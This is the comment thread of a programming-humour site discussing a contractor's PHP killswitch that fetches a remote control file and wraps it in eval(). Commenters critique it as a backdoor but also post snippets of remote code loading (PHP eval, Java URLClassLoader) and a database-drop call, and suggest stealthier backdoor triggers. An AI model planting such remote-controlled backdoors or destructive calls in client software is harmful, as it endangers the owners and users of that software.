• (cs)

    He was probably thinking "Maybe I needing later". Possibly the same guy, to boot.

    Also, fr1st!!!1111eleven

  • cheap shot (unregistered)

    He's not the frist to do something like that.

  • Anonymous Cow-Herd (unregistered)

    It's refreshing for a change to see a developer using Hungarian notation in his name but not his code.

  • Earlchaos (unregistered)

    OMG, that's not only really bad code, that's a backdoor. Loading code from remote server and "eval"uating it is worst practice ever...

    1st php-lesson: eval() is evil() 2nd php-lesson: Never use eval() etc...

    Captcha acsi

  • (cs)

    Markeiting + sholders = missing spell check.

  • Bobby Tables (unregistered)

    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.

    CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2

  • sehe (unregistered) in reply to Earlchaos
    Earlchaos:
    OMG, that's not only really bad code, that's a backdoor.

    uhoh someone is on to the clue

  • Fate (unregistered)

    I don't think much of the obfuscation of the guilty URL. (Select the text...)

  • FM (unregistered) in reply to Fate

    This is SOP for UK MOD redaction, I see nothing wrong with it.

  • Nagesh (unregistered)

    This can be done with URL clasloder in Java.

    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
  • (cs)

    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

  • Gary (unregistered)

    Isn't drupal just one big backdoor?

  • Nagesh (unregistered) in reply to Bobby Tables
    Bobby Tables:
    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used.
    That's only as long as the control file keeps containing "1". Whoever is in control of the remote site that hosts it can change the content to something malicious at his leisure, as long as it also keeps evaluating as true (which AFAIK just means that it's neither empty or a zero constant). That's a back door there big enough to drive a space shuttle crawler-transporter through.
  • Jupiter (unregistered) in reply to Fate
    Fate:
    I don't think much of the obfuscation of the guilty URL. (Select the text...)

    really? I found it very amusing...

  • (cs) in reply to steenbergh
    steenbergh:
    If there were programming licenses, most of this crap could be prevented in the first place...
    Ever heard of an incompetent doctor? Lawyer? Accountant? Plumber?

    All have licenses. Government issued paperwork does not guarantee competence.

  • Robert Remote Drop Tables (unregistered) in reply to Bobby Tables
    Bobby Tables:
    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.

    CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2

    It gets better: thanks to the eval, this fraudulent individual could not even disable the website, he could just insert a line to kill the database:
    mysql_drop_db ("marketingCMS");

    Or he could just install a rootkit. Evil in any way.

  • (cs) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

    If you are going to have programming licenses, then you need to have programming police as well, who patrol your source code, and write you $175 tickets.

  • Stev (unregistered)

    Before anyone gets excited -

    lookup failed www.initrode-global.com Could not find an IP address for this domain name. Domain Whois record

    Queried whois.internic.net with "dom initrode-global.com"...

    No match for domain "INITRODE-GLOBAL.COM".

    Last update of whois database: Mon, 10 Oct 2011 13:55:05 UTC <<<

    Network Whois record

    Don't have an IP address for which to get a record DNS records

    DNS query for www.initrode-global.com returned an error from the server: NameError

    DNS query for initrode-global.com returned an error from the server: NameError

    No records to display Traceroute

    Don't have a destination IP address Service scan

    Don't have an IP address to scan for services

    I suspect that the domain name is fake and that the "obfuscation" used was a dig at the UK MOD.

  • (cs)

    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.

  • Nagesh (unregistered) in reply to Stev
    Stev:
    Before anyone gets excited -
    lookup failed www.initrode-global.com Could not find an IP address for this domain name.
    Initrode/initech/init*** is the standard dummy company name in TDWTF stories. That's the anonymization; the css-based blacking-out is just for the lulz -- apparently to see how many readers will fall for it this time and write indignant comments stating that the redaction was ineffective.
  • Michael Bolton (unregistered)

    Initrode is an Office Space reference

  • Nagesh (unregistered) in reply to dohpaz42
    dohpaz42:
    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that.
    You can do that on with logic on the external site that serves the control file. The only reason why it had such a blatant result in this case was that the production server could not get at the control file at all due to the firewall. Otherwise it could well have gone undetected that one out of 10,000 requests for rg_initrode.txt returned a malicious payload instead of the ordinary "1".
  • Not Me (unregistered)

    It used to be common practice to use eval to catch (and ignore) any errors. If file_get_contents failed for any reason (like that function being disabled) the code silently eats that fail. I suspect this code was written before PHP 5 introduced try / catch.

  • (cs) in reply to snoofle

    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

  • trtrwtf (unregistered)

    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

  • (cs) in reply to Rootbeer
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

  • trtrwtf (unregistered) in reply to QJo
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

  • JustAnother (unregistered)

    TRWTF is RGB(0,0,0)

    Like seriously, you can't just use the native: "#000"?

  • foo (unregistered) in reply to trtrwtf
    trtrwtf:
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

    You suggest we should have talent shows for programmers on TV?
  • trtrwtf (unregistered) in reply to foo
    foo:
    trtrwtf:
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

    You suggest we should have talent shows for programmers on TV?

    Worst idea ever. I love it.

  • foo (unregistered) in reply to dohpaz42
    dohpaz42:
    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.
    Except he wasn't in it for the lulz but for the money, i.e. extorting them.

    Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.

  • (cs) in reply to Nagesh
    Nagesh:
    That's only as long as the control file keeps containing "1". Whoever is in control of the remote site that hosts it can change the content to something malicious at his leisure, as long as it also keeps evaluating as true (which AFAIK just means that it's neither empty or a zero constant). That's a back door there big enough to drive a space shuttle crawler-transporter through.

    This Nagesh is obviously a fake; note the correct English and grammar on all of it's posts. The real Nagesh writes in Hinglish.

  • DGM (unregistered) in reply to foo
    foo:
    Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.

    wasn't that hard to see. if your eval followed by a url ... red flags and loud klaxon alarms should be going off

  • x00|\|3$!$ (unregistered) in reply to trtrwtf
    trtrwtf:
    QJo:
    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel
    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.
    I think "Worse Than Fish-smell" is where pimps go to gossip about burnt-out employees, and their only credential is the Whoremonger's Creed - which is not administered by a government agency.
  • Spudley (unregistered)
    1. The code hacked directly into the Drupal core; if the Drupal installation ever got updated (ie if a security patch was released), installing the update would have wiped out the hack. (and any other hacks lurking in the core)

    2. The eval() is completely aritrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval().... really no idea why he used eval() for this at all. It would have worked exactly the same without it.

    3. It's not just the firewall that could have blocked this from working. PHP has a config setting that will prevent file_get_contents() from loading remote URLs. This setting is generally recommended to be enabled for security reasons, so the code given wouldn't work on a default PHP installation, regardless of the firewall setting.

    4. The "strangely out of place line" seems to be missing from the original post. I assume it's a function call that leads to the eval() line?

  • (cs) in reply to foo
    foo:
    You suggest we should have talent shows for programmers on TV?
    I would watch the stuffing out of that!
  • Doug (unregistered) in reply to Spudley
    Spudley:
    2. The eval() is completely aritrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval().... really no idea why he used eval() for this at all. It would have worked exactly the same without it.

    Run this and see what happens.

    eval( $test = "echo 'wooooooo';" );

    The assignment statement is evaluated as an expression, which evaluates to the contents of the assignment.

  • Artemus Harper (unregistered) in reply to Nagesh
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
    Close, you actually need to state the name of the class you want to load in loadClass(String) method.

    I know Runescape did (still doing?) something like this, except instead of using a URLClassLoader, they simply made their own and verified that the external code they were loading was of the correct size. This meant that if you put the runescape applet and your own on the same web page you could trick it into loading different code instead and compromise someone's computer if they (previously) choose to always trust runescape applets just by having them visit a web site. Can't do this anymore due to changing an Applet's stub require a security permission if it isn't already set.

  • th (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

    I thought the P in LAMP was Perl/Python/PHP, all depending on what flavor you wanted?

  • yername (unregistered) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

    Not most. Some. To get rid of most you'd need management licenses.

  • ChumbleSpuzz (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

    Because that's what it stands for! "P" can stand for Perl, PHP, or Python; although, I mostly use it in reference to PHP.

  • Nagesh (unregistered) in reply to Artemus Harper
    Artemus Harper:
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
    Close, you actually need to state the name of the class you want to load in loadClass(String) method.
    Thanking you very much for the correctings!!!
  • Gary (unregistered)

    Drupal has a couple of good core backdoors for this use case: probably the best is that users can create their own accounts in the default install. So instead of looking for a file on his own server, he could have looked for a user on the drupal instance with a distinct name.

    If user "fhqwhgads" exists, then do whatever...

  • Roman (unregistered) in reply to Gary
    Gary:
    Isn't drupal just one big backdoor?
    Yes, it is.
  • Roman (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?
    What a heck is Perl?
  • Laszlo (unregistered) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be legitimized in the first place...

    FTFY.

  • Risky (unregistered)

    He sust have spent too much time working on the project and not enough time on the killswitch.

    Best have another (seemingly unsabotaged ) application look for the internet kill-flag and just store it and then have the sabotaged app look that up in the unsabotaged system.

  • Sometimes a Cigar is a Cigar (unregistered)

    So when it's done in on the web in PHP, we call it a malicious backdoor. Developers who use it are unethical.

    If it's done on the desktop, mobile platform, or video game console, we call it DRM and it's illegal (in the United States anyway) to circumvent. Developers cherish it, thinking it will stop piracy (HA!)

    What a messed up world...

  • Bob (unregistered)

    Why does everyone think this is a backdoor? Maybe it will be easier to see if it's formatted:

    eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; )

    For one thing, eval() expects a string argument--not PHP code--so this won't even run. And even if the code inside the eval() were run, it would not evaluate the contents of the remote file! It would just assign the contents to $enabled.

  • Lest ye XSS (unregistered) in reply to Nagesh
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    

    Java at least has SecurityManager classes. You can sandbox your JVM. For example, the Java SQL stored procedures do so.

Leave a comment on “The Jammed Killswitch”

Log In or post as a guest

Replying to comment #:

« Return to Article